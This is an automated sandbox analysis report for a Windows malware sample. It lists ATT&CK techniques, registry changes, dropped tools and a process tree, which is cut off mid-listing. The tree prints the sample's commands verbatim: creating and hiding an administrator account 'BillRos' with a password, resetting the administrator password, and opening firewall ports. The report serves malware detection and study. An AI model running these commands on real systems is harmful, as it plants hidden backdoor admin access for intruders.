2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09/09/2024, 21:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Size

1.2MB
MD5

1a027bd2e0bd67f33bb6ad6f4029b1c6
SHA1

763e46995b5401cb489a25c3b947000368911d4d
SHA256

2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50
SHA512

d27761d31cca6c425e555f85f9e12b076ce62efca1756f15e65d3bf1013ca660ad47464b6785d10c815e2b82f8de953db6a45b98e079fa462b73ac613434849f
SSDEEP

24576:XD7Xr5my0DPP23Iy5YAmRW6B8If0s83I4eqowSwa1X9tqY7Jxiq+n:XD7Xroy0DPP23Iy5YAmw6B8If0F3Iwo4

Score

10^/10

defense_evasion discovery evasion execution persistence privilege_escalation

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 12 IoCs

flow	pid	Process
3	1268	powershell.exe
4	3528	powershell.exe
5	3352	powershell.exe
6	8	powershell.exe
7	4004	powershell.exe
8	2136	powershell.exe
9	4708	powershell.exe
10	5008	powershell.exe
11	3412	powershell.exe
12	1840	powershell.exe
13	1408	powershell.exe
14	3056	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2844	powershell.exe
2740	powershell.exe
4508	powershell.exe
3412	powershell.exe
5008	powershell.exe
2136	powershell.exe
4708	powershell.exe
8	powershell.exe
3056	powershell.exe
1268	powershell.exe
1840	powershell.exe
4004	powershell.exe
3352	powershell.exe
3528	powershell.exe
1408	powershell.exe
5296	powershell.exe
5364	powershell.exe

Disables taskbar notifications via registry modification
evasion
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 7 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5696	netsh.exe
5968	netsh.exe
5924	netsh.exe
6592	netsh.exe
6760	netsh.exe
6744	netsh.exe
6312	netsh.exe

Modifies WinLogon 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Billros = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administrator = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Power Settings 1 TTPs 7 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4564	powercfg.exe
2628	powercfg.exe
2920	powercfg.exe
3308	powercfg.exe
1004	powercfg.exe
4976	powercfg.exe
1072	powercfg.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Billros = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administrator = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\windows\whois.exe	powershell.exe
File created	C:\windows\putty.exe	powershell.exe
File created	C:\windows\Procmon.exe	powershell.exe
File created	C:\windows\netscan.exe	powershell.exe
File created	C:\windows\PsExec.exe	powershell.exe
File created	C:\windows\winmtr.exe	powershell.exe
File created	C:\windows\Fping.exe	powershell.exe
File created	C:\windows\procexp.exe	powershell.exe
File created	C:\windows\grep.exe	powershell.exe
File opened for modification	C:\windows\resources\themes\BComp.theme	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
File created	C:\windows\devcon.exe	powershell.exe
File created	C:\windows\nircmd.exe	powershell.exe
File created	C:\windows\TreeSizeFree.exe	powershell.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\software\microsoft\internet explorer\main	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL = "google.com"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "google.com"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Modifies data under HKEY_USERS 32 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Set value (int)	\REGISTRY\USER\default\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "1"	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Set value (int)	\REGISTRY\USER\default\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontUsePowerShellOnWinX = "1"	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\software\microsoft\windows\currentversion\policies\explorer	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Policies\Microsoft\Windows\Personalization	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5008	powershell.exe
5008	powershell.exe
1408	powershell.exe
1408	powershell.exe
4004	powershell.exe
4004	powershell.exe
4508	powershell.exe
4508	powershell.exe
2844	powershell.exe
2844	powershell.exe
1840	powershell.exe
1840	powershell.exe
8	powershell.exe
8	powershell.exe
3528	powershell.exe
3528	powershell.exe
2740	powershell.exe
2740	powershell.exe
5364	powershell.exe
5364	powershell.exe
2136	powershell.exe
2136	powershell.exe
3412	powershell.exe
3412	powershell.exe
4004	powershell.exe
1268	powershell.exe
3056	powershell.exe
3056	powershell.exe
1268	powershell.exe
5296	powershell.exe
5296	powershell.exe
3352	powershell.exe
3352	powershell.exe
4708	powershell.exe
4708	powershell.exe
4508	powershell.exe
4508	powershell.exe
1268	powershell.exe
1408	powershell.exe
1408	powershell.exe
5008	powershell.exe
5008	powershell.exe
1840	powershell.exe
1840	powershell.exe
2740	powershell.exe
2740	powershell.exe
2844	powershell.exe
2844	powershell.exe
5296	powershell.exe
5296	powershell.exe
3528	powershell.exe
3528	powershell.exe
8	powershell.exe
8	powershell.exe
5364	powershell.exe
5364	powershell.exe
3352	powershell.exe
2136	powershell.exe
2136	powershell.exe
3412	powershell.exe
3412	powershell.exe
3056	powershell.exe
3056	powershell.exe
4708	powershell.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4976	powercfg.exe
Token: SeCreatePagefilePrivilege	4976	powercfg.exe
Token: SeShutdownPrivilege	4976	powercfg.exe
Token: SeCreatePagefilePrivilege	4976	powercfg.exe
Token: SeShutdownPrivilege	2628	powercfg.exe
Token: SeCreatePagefilePrivilege	2628	powercfg.exe
Token: SeShutdownPrivilege	2920	powercfg.exe
Token: SeCreatePagefilePrivilege	2920	powercfg.exe
Token: SeShutdownPrivilege	3308	powercfg.exe
Token: SeCreatePagefilePrivilege	3308	powercfg.exe
Token: SeShutdownPrivilege	1072	powercfg.exe
Token: SeCreatePagefilePrivilege	1072	powercfg.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	5296	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	5364	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeShutdownPrivilege	4564	powercfg.exe
Token: SeCreatePagefilePrivilege	4564	powercfg.exe
Token: SeShutdownPrivilege	1004	powercfg.exe
Token: SeCreatePagefilePrivilege	1004	powercfg.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeRestorePrivilege	7116	reg.exe
Token: SeRestorePrivilege	6332	reg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3264 wrote to memory of 2488	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	85
PID 3264 wrote to memory of 2488	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	85
PID 3264 wrote to memory of 3720	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	86
PID 3264 wrote to memory of 3720	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	86
PID 3264 wrote to memory of 3480	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	87
PID 3264 wrote to memory of 3480	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	87
PID 3264 wrote to memory of 1056	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	88
PID 3264 wrote to memory of 1056	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	88
PID 2488 wrote to memory of 852	2488	cmd.exe	93
PID 2488 wrote to memory of 852	2488	cmd.exe	93
PID 852 wrote to memory of 900	852	net.exe	94
PID 852 wrote to memory of 900	852	net.exe	94
PID 3480 wrote to memory of 3184	3480	cmd.exe	95
PID 3480 wrote to memory of 3184	3480	cmd.exe	95
PID 1056 wrote to memory of 4664	1056	cmd.exe	96
PID 1056 wrote to memory of 4664	1056	cmd.exe	96
PID 3184 wrote to memory of 1636	3184	net.exe	97
PID 3184 wrote to memory of 1636	3184	net.exe	97
PID 3720 wrote to memory of 4692	3720	cmd.exe	98
PID 3720 wrote to memory of 4692	3720	cmd.exe	98
PID 4692 wrote to memory of 3588	4692	net.exe	99
PID 4692 wrote to memory of 3588	4692	net.exe	99
PID 4664 wrote to memory of 2576	4664	net.exe	100
PID 4664 wrote to memory of 2576	4664	net.exe	100
PID 3264 wrote to memory of 392	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	104
PID 3264 wrote to memory of 392	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	104
PID 3264 wrote to memory of 1516	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	105
PID 3264 wrote to memory of 1516	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	105
PID 3264 wrote to memory of 3104	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	107
PID 3264 wrote to memory of 3104	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	107
PID 3264 wrote to memory of 64	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	108
PID 3264 wrote to memory of 64	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	108
PID 3264 wrote to memory of 1476	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	110
PID 3264 wrote to memory of 1476	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	110
PID 3264 wrote to memory of 224	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	111
PID 3264 wrote to memory of 224	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	111
PID 3264 wrote to memory of 1968	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	112
PID 3264 wrote to memory of 1968	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	112
PID 3264 wrote to memory of 4152	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	113
PID 3264 wrote to memory of 4152	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	113
PID 3264 wrote to memory of 2252	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	115
PID 3264 wrote to memory of 2252	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	115
PID 3264 wrote to memory of 208	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	117
PID 3264 wrote to memory of 208	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	117
PID 3264 wrote to memory of 4544	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	118
PID 3264 wrote to memory of 4544	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	118
PID 3264 wrote to memory of 4976	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	124
PID 3264 wrote to memory of 4976	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	124
PID 3264 wrote to memory of 1004	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	125
PID 3264 wrote to memory of 1004	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	125
PID 3264 wrote to memory of 3308	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	126
PID 3264 wrote to memory of 3308	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	126
PID 3264 wrote to memory of 2920	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	127
PID 3264 wrote to memory of 2920	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	127
PID 3264 wrote to memory of 2628	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	128
PID 3264 wrote to memory of 2628	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	128
PID 3264 wrote to memory of 4564	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	130
PID 3264 wrote to memory of 4564	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	130
PID 3264 wrote to memory of 1072	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	131
PID 3264 wrote to memory of 1072	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	131
PID 3264 wrote to memory of 2740	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	133
PID 3264 wrote to memory of 2740	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	133
PID 3264 wrote to memory of 2844	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	134
PID 3264 wrote to memory of 2844	3264	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	134

System policy modification 1 TTPs 7 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth = "1"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "3"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
"C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe"
1⤵
- Modifies visibility of file extensions in Explorer
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\system32\net.exe
    net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes
      4⤵
      PID:900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net user billros /active"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3720
- - C:\Windows\system32\net.exe
    net user billros /active
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user billros /active
      4⤵
      PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net localgroup administrators" /add billros
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\system32\net.exe
    net localgroup administrators /add billros
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators /add billros
      4⤵
      PID:1636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Windows\system32\net.exe
    net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes
      4⤵
      PID:2576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net user administrator /active"
  2⤵
  PID:392
- - C:\Windows\system32\net.exe
    net user administrator /active
    3⤵
    PID:3808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user administrator /active
      4⤵
      PID:5288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell -command set-localuser billros -passwordneverexpires $true"
  2⤵
  PID:1516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command set-localuser billros -passwordneverexpires $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell -command set-localuser administrator -passwordneverexpires $true"
  2⤵
  PID:3104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command set-localuser administrator -passwordneverexpires $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int tcp set global chimney=disabled rss=disabled netdma=disabled
  2⤵
  PID:64
- - C:\Windows\system32\netsh.exe
    netsh int tcp set global chimney=disabled rss=disabled netdma=disabled
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:5272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh firewall set icmp 8 enable
  2⤵
  PID:1476
- - C:\Windows\system32\netsh.exe
    netsh firewall set icmp 8 enable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any
  2⤵
  PID:224
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any
  2⤵
  PID:1968
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6312
- C:\Windows\system32\cmd.exe
